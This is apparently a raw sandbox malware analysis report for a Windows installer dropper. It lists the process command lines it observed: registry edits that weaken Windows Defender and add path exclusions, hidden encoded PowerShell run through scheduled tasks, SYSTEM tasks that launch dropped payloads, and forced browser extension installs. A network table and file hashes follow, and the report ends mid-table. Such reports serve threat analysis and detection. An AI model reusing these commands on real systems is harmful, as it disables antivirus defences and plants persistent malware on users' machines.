"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LsajhStaXkJRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LsajhStaXkJRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QpigBxJgKxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QpigBxJgKxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YNUWFfCEdUiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YNUWFfCEdUiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oWxSecJNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oWxSecJNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eiYaNjTCbhfbMeVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eiYaNjTCbhfbMeVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\biwNYXhGTKCQxjLv\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\biwNYXhGTKCQxjLv\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eiYaNjTCbhfbMeVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eiYaNjTCbhfbMeVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\biwNYXhGTKCQxjLv /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\biwNYXhGTKCQxjLv /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ggrCJTQNb" /SC once /ST 01:54:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ggrCJTQNb"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ggrCJTQNb"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FTlmQXMDCFpnewAuq" /SC once /ST 03:30:36 /RU "SYSTEM" /TR "\"C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe\" VS /site_id 525403 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "FTlmQXMDCFpnewAuq"
C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe
C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe VS /site_id 525403 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bJbhxhmwQPPePEjnjA"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oWxSecJNU\PiCMHN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zeLHdclAQOoTZxj" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "zeLHdclAQOoTZxj2" /F /xml "C:\Program Files (x86)\oWxSecJNU\FtJrrrO.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zeLHdclAQOoTZxj"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zeLHdclAQOoTZxj"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "KJMKKiIztyaoEB" /F /xml "C:\Program Files (x86)\YNUWFfCEdUiU2\hpHQDcJ.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "xicirzYkCmkIU2" /F /xml "C:\ProgramData\eiYaNjTCbhfbMeVB\yhGwuvB.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "LUmQQZwnOYWgZobiD2" /F /xml "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\IjRGpGI.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "IkWUsEdSKunoejOLGpU2" /F /xml "C:\Program Files (x86)\LsajhStaXkJRC\gFQELly.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "dBpreMcpfXbehynYz" /SC once /ST 03:26:49 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\biwNYXhGTKCQxjLv\oGyfpWoM\kkFeUXu.dll\",#1 /site_id 525403" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "dBpreMcpfXbehynYz"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\oGyfpWoM\kkFeUXu.dll",#1 /site_id 525403
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\oGyfpWoM\kkFeUXu.dll",#1 /site_id 525403
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FTlmQXMDCFpnewAuq"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dBpreMcpfXbehynYz"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r10.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 250.117.210.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | addons.mozilla.org | udp |
| US | 151.101.129.91:80 | addons.mozilla.org | tcp |
| US | 151.101.129.91:443 | addons.mozilla.org | tcp |
| US | 8.8.8.8:53 | 82.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.129.101.151.in-addr.arpa | udp |
| US | 151.101.129.91:80 | addons.mozilla.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.187.227:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 10.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.check-data.xyz | udp |
| US | 35.162.118.53:80 | api.check-data.xyz | tcp |
| US | 8.8.8.8:53 | 53.118.162.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zS79E3.tmp\Install.exe
| MD5 | 3b76af9e2510171d3739b8bc9ee2ee68 |
| SHA1 | 4c8148a587ba7e6de8963c2d4dbbcceac39b3694 |
| SHA256 | 3c888be794010977e28034fd484ed7363ff6c52dfe6c8449acbe6cce4e637768 |
| SHA512 | d9736ae8439c7d809cdd299423f8ac04f6301c4eb3c1997fa217b4e8cd77174f795d1632b23f6e8a93eb6c96b998a8258f2366b3d701a7a2b944cab83a3a8d94 |
C:\Users\Admin\AppData\Local\Temp\7zS7BB8.tmp\Install.exe
| MD5 | ad10a30760d467dade24f430b558b465 |
| SHA1 | 7aaa56e80264c27d080c3b77055294593eacca1b |
| SHA256 | 44c717fd08281b16f266bd9bc037fc16713a8ac02e1dfe519ba3be49bac8442a |
| SHA512 | 23c13f8c865da24d848b2843b67190188048e7383dcb2dff10f8e8e94862a8ae1916aef3566cd2ce4346c816f7e8301912a9fff4a04bb5380b75b98bd7154e63 |
memory/920-12-0x0000000010000000-0x0000000010F04000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5crgk42r.vgg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4760-25-0x0000024D785C0000-0x0000024D785E2000-memory.dmp
memory/4440-35-0x0000000010000000-0x0000000010F04000-memory.dmp
memory/1180-36-0x0000000003F00000-0x0000000003F36000-memory.dmp
memory/1180-37-0x0000000004680000-0x0000000004CA8000-memory.dmp
memory/1180-38-0x0000000004630000-0x0000000004652000-memory.dmp
memory/1180-40-0x0000000004E50000-0x0000000004EB6000-memory.dmp
memory/1180-39-0x0000000004DE0000-0x0000000004E46000-memory.dmp
memory/1180-50-0x0000000005080000-0x00000000053D4000-memory.dmp
memory/1180-51-0x0000000005530000-0x000000000554E000-memory.dmp
memory/1180-52-0x0000000005570000-0x00000000055BC000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 33b19d75aa77114216dbc23f43b195e3 |
| SHA1 | 36a6c3975e619e0c5232aa4f5b7dc1fec9525535 |
| SHA256 | b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2 |
| SHA512 | 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8ad58ffb16d5758ba9fc514960d7282c |
| SHA1 | 390821dde4aa9c5fc9e9603501f0f802c9b0cf5a |
| SHA256 | bb74774a082bc786f6ba213106f3ef6b758d0c0470ab9321592ef8d4ffee4093 |
| SHA512 | 7d452af4ca06a6312138f6f14f9387f5905c5613b7bd0ec6747af965fae8bec5abbf7fff8a99156479105d19db03fbca754b3da25b0a38a4ee846168625772eb |
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5caad758326454b5788ec35315c4c304 |
| SHA1 | 3aef8dba8042662a7fcf97e51047dc636b4d4724 |
| SHA256 | 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391 |
| SHA512 | 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693 |
memory/1484-98-0x0000000003FC0000-0x0000000004045000-memory.dmp
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi
| MD5 | dae501599ca0bfcc6b9d7a0adbf84d8c |
| SHA1 | 316d20e28ffe24d5ba546b741fa42ab529e4e877 |
| SHA256 | c718878e050b6e50c57520071079e6b85c31eab6de0e5cb4ab9cb00317575bc5 |
| SHA512 | 6231c554f9dbec4d88a364efb9184ee68a9c7d2689ee6e916460ce350d62a091f5e4c66c0d0c2c1d7397a8864783473f0d4ebba241d73a521db2ff5f8fa2f51f |
memory/1484-144-0x0000000004610000-0x000000000467B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
| MD5 | 103efdadea8dc9131b76649cbba6bedf |
| SHA1 | 30d71efcf6b0935bde43f50f336d886a8a6b8585 |
| SHA256 | f7940488e3457006f40052a873db5f5d403d81b10d566a58a84eb95a5eb419ff |
| SHA512 | f914fb73d4e2a469e54f9832b986738d12737d86687de41aae65add5fb3327a49d72653120c1d1f954d04981263259badf420cb017205c4f417bd4d07528675c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Program Files (x86)\oWxSecJNU\FtJrrrO.xml
| MD5 | 983b30922f148d6b20ad8b662aa488c7 |
| SHA1 | 876ac1c4c505c797e0ec2e78fcd54345636e89b0 |
| SHA256 | f6e1fed86cba2418150aa1a268be5dd1d70126b0a326217c3b47067b32ebcb7e |
| SHA512 | 93d5a2b046427341d45d97ae5d15b80cb0ba32f6a27b551dbf9355d32e73b733921f38acb79016e55dfd79c6dd6be93a27df17e2ea6f9a9d9c3545f52ac84258 |
C:\Program Files (x86)\YNUWFfCEdUiU2\hpHQDcJ.xml
| MD5 | 74eab60eaeb38f2bdadecff88642b134 |
| SHA1 | fb054695ad91001590aa94341c8b7bd637ae9c7c |
| SHA256 | e2020deeaa182827ff26e3438b601f10f09eb655318b166fb0a166c7f3af091c |
| SHA512 | f6b476007d860ca8f93513b73ea1600d33071b86a41b1ecbcdb10b9679734d11c0b14597fe01a6d2e2b85ed3caa5d52b6eca1db9104f2d5359729ee59c80a42e |
C:\ProgramData\eiYaNjTCbhfbMeVB\yhGwuvB.xml
| MD5 | abc83b495a7cab28401f0a422742a5a6 |
| SHA1 | 9d18fad79cb70b66424570c962db0b6fa6689412 |
| SHA256 | e71b5e1904bb12b33e40e3c37c45cb92e8f33363928380d502674572dcc5f345 |
| SHA512 | ec91aba90b958a7e403c74566fd2f0e871f78af067f4e5a6357aff042e03682106fdfd96da7a537d7a371296a0a3070385360562f6b16d237a9896d75d7ca8a9 |
C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\IjRGpGI.xml
| MD5 | bfb13da304f2dab83a758f1e2d1d93b9 |
